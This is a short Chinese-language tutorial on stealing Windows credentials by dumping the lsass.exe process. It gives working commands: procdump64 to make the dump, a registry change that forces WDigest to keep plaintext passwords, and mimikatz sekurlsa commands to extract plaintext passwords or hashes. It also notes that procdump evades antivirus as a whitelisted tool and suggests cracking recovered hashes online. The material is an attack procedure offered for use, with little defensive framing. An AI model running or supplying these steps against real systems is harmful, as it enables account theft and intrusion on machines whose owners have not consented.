内存转储读取密码

转储文件也就是我们常说的dump文件。可以把转储文件看成软件的某个时刻的一个快照。转储文件一般都是在软件出现问题时手动生成或者程序自动生成。
将lsass.exe进程转储成文件后可利用mimi读取其中存储的本地用户明文密码或hash

注意

1. win2008及以下可获取明文密码
2. win2012及以上默认不记录明文密码，需要修改注册表重启后才可以，即仅能获取hash

获得转储文件

任务管理器转储

利用procdump转储

1. procdump，微软维护工具，主要使用它来进行内存转储。Windows在运行的时候不能复制SYSTEM和SAM文件。
2. 需要管理员权限，且procdump是微软工具，在杀软白名单中。
3. 该方法只能在Window 2003、Windows 2008、Windows 2008 R2，且没有打补丁（KB2871997）的情况下可以获取该系统在未清理内存（意为未重启）时存储的登录信息凭证。

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

开启注册表记录明文密码

reg add hklm\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

mimi读取密码

获取lasaa.dmp后，可利用各种工具读取存储的明文密码或hash
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

2012

可以看见，无法获取明文密码，但可以获取hash，如果不复杂可尝试使用cmd5等进行解码